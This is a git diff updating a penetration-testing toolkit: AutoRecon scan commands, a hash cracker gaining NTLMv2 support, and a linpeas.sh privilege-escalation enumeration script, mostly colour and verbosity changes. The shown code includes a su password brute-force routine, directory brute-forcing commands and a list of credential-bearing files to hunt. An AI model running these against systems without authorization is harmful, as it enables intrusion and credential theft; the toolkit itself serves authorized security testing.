diff --git a/autorecon.py b/autorecon.py index 5b4c07f..e9bfd78 100644 --- a/autorecon.py +++ b/autorecon.py @@ -221,7 +221,12 @@ def calculate_elapsed_time(start_time): async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE): address = target.address while True: - line = await stream.readline() + line = "" + try: + line = await stream.readline() + except ValueError: + continue + if line: line = str(line.rstrip(), 'utf8', 'ignore') debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color) @@ -878,4 +883,3 @@ def main(): if __name__ == '__main__': main() - diff --git a/autorecon_config/service-scans.toml b/autorecon_config/service-scans.toml index f51fced..55197e4 100644 --- a/autorecon_config/service-scans.toml +++ b/autorecon_config/service-scans.toml @@ -59,7 +59,7 @@ service-names = [ ] [[finger.scan]] - nmap = 'nmap-finger' + name = 'nmap-finger' command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}' [ftp] @@ -126,8 +126,8 @@ ignore-service-names = [ command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"' [[http.scan]] - name = 'ffuf' - command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt' + name = 'feroxbuster' + command = 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt' [[http.manual]] description = '(nikto) old but generally reliable web server enumeration tool' @@ -136,10 +136,10 @@ ignore-service-names = [ ] [[http.manual]] - description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' + description = '(feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' commands = [ - 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt', - 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt' + 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_big.txt', + 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_dirbuster.txt' ] [[http.manual]] @@ -159,8 +159,8 @@ ignore-service-names = [ [[http.manual]] description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):' commands = [ - 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', - 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' + 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', + 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' ] [[http.manual]] diff --git a/crack_hash.py b/crack_hash.py index 97e9792..7348abf 100755 --- a/crack_hash.py +++ b/crack_hash.py @@ -65,6 +65,7 @@ class HashType(enum.Enum): LM = 3000 NTLM = 1000 MSSQL = 1731 + NTLMV2_SSP = 5600 # Kerberos KERBEROS_AS_REQ = 7500 @@ -109,9 +110,15 @@ class Hash: elif crypt_type == "S": self.type.append(HashType.DRUPAL7) else: - self.isSalted = ":" in raw_hash - if self.isSalted: - raw_hash, self.salt = raw_hash.split(":") + if ":" in raw_hash: + parts = raw_hash.split(":") + if len(parts) == 2: + self.isSalted = True + raw_hash, self.salt = raw_hash.split(":") + elif len(parts) == 6: + self.type.append(HashType.NTLMV2_SSP) + + # Base64 -> hex try: diff --git a/fileserver.py b/fileserver.py index 44e9522..ca62b61 100755 --- a/fileserver.py +++ b/fileserver.py @@ -132,7 +132,7 @@ class HttpFileServer(HTTPServer): data = data.encode("UTF-8") # return 200 - OK and data - self.addRoute(name, lambda req: (data, 200)) + self.addRoute(name, lambda req: (200, data)) def dumpRequest(self, name): self.dumpRequests.append(self.cleanPath(name)) diff --git a/linpeas.sh b/linpeas.sh index ecf5a2b..cd02365 100755 --- a/linpeas.sh +++ b/linpeas.sh @@ -1,6 +1,6 @@ #!/bin/sh -VERSION="v3.2.0" +VERSION="v3.2.6" ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." ########################################### @@ -15,17 +15,25 @@ else fi -########################################### +########################################### #---------------) Colors (----------------# ########################################### C=$(printf '\033') RED="${C}[1;31m" +SED_RED="${C}[1;31m&${C}[0m" GREEN="${C}[1;32m" -Y="${C}[1;33m" -B="${C}[1;34m" +SED_GREEN="${C}[1;32m&${C}[0m" +YELLOW="${C}[1;33m" +SED_YELLOW="${C}[1;33m&${C}[0m" +SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" +BLUE="${C}[1;34m" +SED_BLUE="${C}[1;34m&${C}[0m" +ITALIC_BLUE="${C}[1;34m${C}[3m" LG="${C}[1;37m" #LightGray +SED_LG="${C}[1;37m&${C}[0m" DG="${C}[1;90m" #DarkGray +SED_DG="${C}[1;90m&${C}[0m" NC="${C}[0m" UNDERLINED="${C}[5m" ITALIC="${C}[3m" @@ -47,31 +55,34 @@ QUIET="" CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" WAIT="" PASSWORD="" +NOCOLOR="" +VERBOSE="" THREADS="`((grep -c processor /proc/cpuinfo 2>/dev/null) || ((command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n"`" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && eTHREADS="2" #If THREADS is null, put number 2 [ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. - $Y-h$B To show this message - $Y-q$B Do not show banner - $Y-a$B All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly - $Y-s$B SuperFast (don't check some time consuming checks) - Stealth mode - $Y-w$B Wait execution between big blocks - $Y-n$B Do not export env variables related with history and do not check Internet connectivity - $Y-P$B Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - $Y-o$B Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. - $Y-L$B Force linpeas execution. - $Y-M$B Force macpeas execution. - $Y-t$B Threads to search files inside the system (by default it's the number of CPU threads). - $Y-d $B Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 - $Y-p -d $B Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 - $Y-i [-p ]$B Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 - $GREEN Notice$B that if you select some network action, no PE check will be performed\n\n$NC" + ${YELLOW}-h${BLUE} To show this message + ${YELLOW}-q${BLUE} Do not show banner + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode + ${YELLOW}-w${BLUE} Wait execution between big blocks + ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-N${BLUE} Do not use colours + ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' + ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-L${BLUE} Force linpeas execution. + ${YELLOW}-M${BLUE} Force macpeas execution. + ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 + ${YELLOW}-p -d ${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 + ${YELLOW}-i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 + $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwt:" opt; do +while getopts "h?asnd:p:i:P:qo:LMwNv" opt; do case "$opt" in - h|\?) printf "$HELP"$NC; exit 0;; + h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; a) FAST="";; s) SUPERFAST=1;; n) NOTEXPORT=1;; @@ -84,11 +95,32 @@ while getopts "h?asnd:p:i:P:qo:LMwt:" opt; do L) MACPEAS="";; M) MACPEAS="1";; w) WAIT=1;; - t) THREADS=$OPTARG;; + N) NOCOLOR="1";; + v) VERBOSE="1";; esac done if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi +if [ "$NOCOLOR" ]; then + C="" + RED="" + SED_RED="" + GREEN="" + SED_GREEN="" + YELLOW="" + SED_YELLOW="" + SED_RED_YELLOW="" + BLUE="" + SED_BLUE="" + ITALIC_BLUE="" + LG="" + SED_LG="" + DG="" + SED_DG="" + NC="" + UNDERLINED="" + ITALIC="" +fi ########################################### @@ -124,7 +156,7 @@ print_banner(){ \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;22;48;5;233m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;22;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;233m░\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;64m▒\e[38;5;119;48;5;70m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;70m▒\e[38;5;119;48;5;234m▒\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;237m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m '"; - + else if [ -f "/bin/bash" ]; then /bin/bash -c "printf ' @@ -153,7 +185,7 @@ print_banner(){ \e[48;2;95;106;94m\e[38;2;253;253;253m▄\e[48;2;81;137;65m\e[38;2;243;243;243m▄\e[48;2;91;166;73m\e[38;2;182;185;181m▄\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[48;2;28;50;23m\e[38;2;180;180;180m▄\e[48;2;20;22;20m\e[38;2;240;240;240m▄\e[48;2;86;85;86m\e[38;2;253;253;253m▄\e[48;2;199;199;199m\e[38;2;255;255;255m▄ \e[0m \e[48;2;146;147;145m\e[38;2;254;254;254m▄\e[48;2;41;52;39m\e[38;2;242;242;242m▄\e[48;2;39;76;30m\e[38;2;192;192;192m▄\e[48;2;73;136;57m\e[38;2;132;134;132m▄\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[48;2;53;97;41m\e[38;2;111;111;111m▄\e[48;2;24;44;19m\e[38;2;186;186;186m▄\e[48;2;36;41;35m\e[38;2;242;242;242m▄\e[48;2;132;131;132m\e[38;2;255;255;255m▄\e[0m '"; - + else echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m @@ -179,21 +211,21 @@ print_banner(){ echo "" if [ !"$QUIET" ]; then print_banner; fi -printf $B" $SCRIPTNAME $VERSION ${Y}by carlospolop\n"$NC; +printf ${BLUE}" $SCRIPTNAME $VERSION ${YELLOW}by carlospolop\n"$NC; echo "" -printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC +printf ${YELLOW}"ADVISORY: "${BLUE}"$ADVISORY\n"$NC echo "" -printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC +printf ${BLUE}"Linux Privesc Checklist: "${YELLOW}"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," -echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m," -echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m," +echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," +echo " RED: You should take a look to it" | sed "s,RED,${SED_RED}," echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," -echo " Blue: Users without console & mounted devs" | sed "s,Blue,${C}[1;34m&${C}[0m," -echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${C}[1;32m&${C}[0m," +echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE}," +echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN}," echo " LightMagenta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," if [ "$IAMROOT" ]; then echo "" - echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${C}[1;31;103m&${C}[0m," + echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW}," sleep 3 fi echo "" @@ -340,7 +372,7 @@ if [ $? -ne 0 ] ; then if [ $? -eq 0 ] ; then E=r else - echo "${Y}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" + echo "${YELLOW}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" fi fi @@ -394,7 +426,7 @@ PASSTRY="2000" #Default num of passwds to try (all by default) if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this SEDOVERFLOW=true -for grp in `groups $USER 2>/dev/null | cut -d ":" -f2`; do +for grp in `groups $USER 2>/dev/null | cut -d ":" -f2`; do wgroups="$wgroups -group $grp -or " done wgroups="`echo $wgroups | sed -e 's/ -or$//'`" @@ -405,9 +437,9 @@ while $SEDOVERFLOW; do #else # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` #fi - Wfolders=`printf "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" - Wfolder="`printf "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" - printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" >/dev/null 2>&1 + Wfolders=`printf "%s" "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" + Wfolder="`printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" + printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1 if [ $? -eq 0 ]; then SEDOVERFLOW=false else @@ -441,9 +473,9 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh| knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-messaging.timer|ureadahead-stop.timer" -commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" +commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" @@ -456,6 +488,8 @@ GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSys GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" GREP_IGNORE_MOUNTS="/ /|/cgroup|/var/lib/docker/|/null | proc proc |/dev/console|docker.sock" +INT_HIDDEN_FILES=".rhosts|.irssi|.keyring|.cer|.jks|.service|.vnc|.p12|.ftpconfig|.crt|.lesshst|.git-credentials|._history|.sudo_as_admin_successful|.timer|.gnupg|.gpg|.sqlite3|.recently-used.xbel|.erlang.cookie|.socket|.pem|.cloudflared|.bashrc|.git|.pypirc|.csr|.plan|.rdg|.ovpn|.pfx|.gitconfig|.svn|.der|.sqlite|.google_authenticator|.viminfo|.bluemix|.htpasswd|.kdbx|.mozilla|.env|.vault-token|.ldaprc|.swp|.msmtprc|.profile|.github|.pgp|.keystore|.db|.k5login|.key" + ########################################### #---------) Checks before start (---------# ########################################### @@ -470,10 +504,10 @@ DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" FPING=$(command -v fping 2>/dev/null) PING=$(command -v ping 2>/dev/null) if [ "$FPING" ]; then - DISCOVER_BAN_GOOD="$GREEN$FPING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" else if [ "$PING" ]; then - DISCOVER_BAN_GOOD="$GREEN$PING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" fi fi @@ -492,7 +526,7 @@ if [ -z "$FOUND_NC" ]; then FOUND_NC=$(command -v nc.openbsd 2>/dev/null); fi if [ "$FOUND_NC" ]; then - SCAN_BAN_GOOD="$GREEN$FOUND_NC$B is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" + SCAN_BAN_GOOD="$GREEN$FOUND_NC${BLUE} is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" fi @@ -501,29 +535,83 @@ fi ########################################### echo_not_found (){ - printf $DG"$1 Not Found\n"$NC + if [ "$VERBOSE" ]; then + printf $DG"$1 Not Found\n"$NC + fi +} + +warn_exec(){ + $* || echo_not_found $1 } echo_no (){ printf $DG"No\n"$NC } +print_title(){ + if [ "$VERBOSE" ]; then + END_T2_TIME=`date +%s 2>/dev/null` + if [ "$START_T2_TIME" ]; then + TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) + printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC + fi + + END_T1_TIME=`date +%s 2>/dev/null` + if [ "$START_T1_TIME" ]; then + TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME)) + printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC + echo "" + fi + + START_T1_TIME=`date +%s 2>/dev/null` + fi + + printf ${BLUE}"════════════════════════════════════╣ "$GREEN"$1"${BLUE}" ╠════════════════════════════════════\n"$NC +} + +print_2title(){ + if [ "$VERBOSE" ]; then + END_T2_TIME=`date +%s 2>/dev/null` + if [ "$START_T2_TIME" ]; then + TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) + printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC + echo "" + fi + + START_T2_TIME=`date +%s 2>/dev/null` + fi + + printf ${BLUE}"╔══════════╣ "$GREEN"$1\n"$NC #There are 10 "═" +} + +print_3title(){ + printf ${BLUE}"══╣ "$GREEN"$1\n"$NC #There are 2 "═" +} + +print_list(){ + printf ${BLUE}"═╣ "$GREEN"$1"$NC #There is 1 "═" +} + +print_info(){ + printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC +} + print_ps (){ - (ls -d /proc/*/ 2>/dev/null | while read f; do + (ls -d /proc/*/ 2>/dev/null | while read f; do CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess - if [ "$CMDLINE" ]; - then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; - printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; - fi; + if [ "$CMDLINE" ]; + then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; + printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; + fi; done) 2>/dev/null | sort -r } su_try_pwd (){ BFUSER=$1 PASSWORDTRY=$2 - trysu=`echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null` + trysu=`echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null` if [ "$trysu" ]; then - echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi } @@ -536,7 +624,7 @@ su_brute_user_num (){ if [ "$PASSWORD" ]; then su_try_pwd $BFUSER 